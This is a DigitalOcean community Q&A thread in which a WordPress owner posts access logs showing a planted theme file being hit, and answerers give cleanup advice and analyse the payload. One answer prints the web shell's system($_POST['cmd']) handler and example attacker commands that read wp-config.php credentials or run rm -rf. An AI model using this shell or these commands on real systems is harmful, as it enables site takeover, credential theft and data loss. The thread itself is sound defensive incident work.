162.158.178.13 - - [13/Feb/2017:14:18:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:19:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.128 - - [13/Feb/2017:14:19:17 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
172.68.25.74 - - [13/Feb/2017:14:19:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:20:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:20:15 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:21:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:22:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:22:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
188.114.110.248 - - [13/Feb/2017:14:22:45 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
108.162.241.86 - - [13/Feb/2017:14:22:50 -0500] "GET /2016/the-count-of-monte-cristo-dumas/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.178.13 - - [13/Feb/2017:14:23:07 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:09 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:13 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:23:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:23:18 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:23 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.65.76 - - [13/Feb/2017:14:23:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:24:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:24:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:25:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:26:06 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:26:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.2.98 - - [13/Feb/2017:14:26:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
172.68.10.62 - - [13/Feb/2017:14:26:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
162.158.59.104 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D" "Jetpack by WordPress.com"
162.158.62.103 - - [13/Feb/2017:14:26:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:27:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:27:25 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.46.63 - - [13/Feb/2017:14:27:27 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D" "Jetpack by WordPress.com"
108.162.215.134 - - [13/Feb/2017:14:27:29 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D" "Jetpack by WordPress.com"
162.158.59.236 - - [13/Feb/2017:14:27:30 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D" "Jetpack by WordPress.com"
162.158.78.44 - - [13/Feb/2017:14:27:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:28:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:29:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.237.20 - - [13/Feb/2017:14:29:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
172.68.51.152 - - [13/Feb/2017:14:29:46 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:30:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.242 - - [13/Feb/2017:14:30:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:31:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:31:19 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:32:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:32:40 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:32:43 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.78.44 - - [13/Feb/2017:14:32:43 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:32:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.178.13 - - [13/Feb/2017:14:32:59 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:04 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:06 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.101.80.200 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:20 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.22.188 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:34:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.102.200 - - [13/Feb/2017:14:34:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.212 - - [13/Feb/2017:14:34:40 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:35:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:36:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.143.250 - - [13/Feb/2017:14:36:48 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.59.128 - - [13/Feb/2017:14:36:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"

At the moment I have been going through and removing all the 'eval('s to get my site working again, but this is hardly a long term solution. Need some help getting this fixed.

Cheers, Sebastian

Jonathan Tittle · Accepted Answer

@sebastiankade

There are a few plugins that you can enable to tighten up security – such as Wordfence Security. A plugin, however, will only carry you so far.

There’s a number of potentials, though one is happening now and that’s attacks on the JSON API. If you’re not using WordPress 4.7.2, you’re vulnerable.

That said, if you’ve upgraded and there’s still code that allows remote execution of code, even the security release update won’t matter as you need to find the source of the attack.

Recommendations

What I would recommend doing is installing the Wordfence Security plugin and letting it perform an initial scan and see what pops up.

Also, this file seems to pop up quite often in the errors you’re showing. Find out what it is and if it’s not something you’ve setup, remove it.

/wp-content/themes/twentysixteen/css/global32.php

Additionally, check your directory permissions. If any directory is setup with a CHMOD of 777, fix it by changing it to 755.

To do this quickly, you can run something such as:

find /vavr/www/html -type d -exec chmod 755 {} \;

What the above command will do is recursively change all directories to a CHMOD of 755 from ./html and down.

You can do the same for files, which should be CHMOD 644.

find /vavr/www/html -type f -exec chmod 644 {} \;

Depending on how Apache is setup, this may prevent you from installing plugins or modifying files, though for the time being, that’s not as much of an issue since we are in the process of trying to figure out where the attack is or is heading.

Woet · Answer

Are you keeping your server, your Wordpress and your plugins/themes up to date?

Jonathan Tittle · Answer

@sebastiankade

As an update, regarding the hack/breach, he’s the details.

Hopefully my previous response was at least somewhat helpful. Taking a closer look at the base64 code that you provided, once decoded, it’s actually a PHP/JS script that allows a remote attacker to essentially run any command that they wish.

It’s not limited to basic commands such as getting a directory listing using ls or ls -al either. I ran a few tests on a throw away Droplet and it will allow an attacker to quickly and easily delete your files so this is something you need to handle quickly if there’s anything that’s of importance.

They are protecting the script with an MD5 hashed password in an attempt to keep it locked down. When successfully logged in you see a black screen and an input/output box. The input accepts any command and the output box shows the results of said command.

So other than creating and deleting files, what good does it do? Well, I did say any command, and that means shell commands.

The part of the script that handles this is this function:

function handle_cmd() {
    system($_POST['cmd']." 2>&1");
}

The above runs a provided shell command and silences the output.

Why does this matter?

Let’s say this script is what the global32.php file is. If I’m the attacker and I login, I can see that my file is located at:

./wp-content/themes/twentysixteen/css/global32.php

So now in the code box of my script, I’ll run:

cat ../../../../../wp-config.php

… and now I have your MySQL Database Credentials and I know what prefix you’re using for your DB. That means that if further code is injected, the attacker can begin to work his/her way in to your DB and cause more havoc than just adding/tampering with files.

Equally as bad, an attacker could also simply run rm -rf and delete all files/directories in one fail swoop.

Report this

DigitalOcean Wordpress instance getting attacked

Become a contributor for community

DigitalOcean Documentation

Resources for startups and SMBs

Get our newsletter

The developer cloud

Get started for free